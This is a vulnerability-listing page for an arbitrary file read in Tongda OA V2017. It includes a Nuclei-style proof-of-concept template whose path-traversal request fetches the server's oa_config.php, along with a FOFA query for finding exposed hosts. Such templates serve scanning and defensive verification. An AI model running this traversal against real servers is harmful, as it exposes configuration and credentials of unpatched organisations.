tongda-video-file-read: Tongda OA V2017 Video File - Arbitrary File Read

日期: 2025-08-01 | 影响软件: Tongda OA V2017 | POC: 已公开

漏洞描述

There is an arbitrary file reading vulnerability in Extreme OA video_file.php. An attacker can obtain sensitive files on the server through the vulnerability.

PoC代码[已公开]

id: tongda-video-file-read

info:
  name: Tongda OA V2017 Video File - Arbitrary File Read
  author: SleepingBag945
  severity: medium
  description: |
    There is an arbitrary file reading vulnerability in Extreme OA video_file.php. An attacker can obtain sensitive files on the server through the vulnerability.
  reference:
    - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html
  classification:
    cpe: cpe:2.3:a:tongda2000:office_anywhere_2017:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="1967132225"
    product: office_anywhere_2017
    vendor: tongda2000
  tags: tongda,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "$ROOT_PATH"
          - "$ATTACH_PATH"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dda9c7f7951052408333829587a6efbbe92713b46449f2115977d7f74796a19e022062daeeb767a226c16ccdd58d8ef394c851ac88e32e3692cab09214b328b4faec:922c64590222798bb761d5b6d8e72950

相关漏洞推荐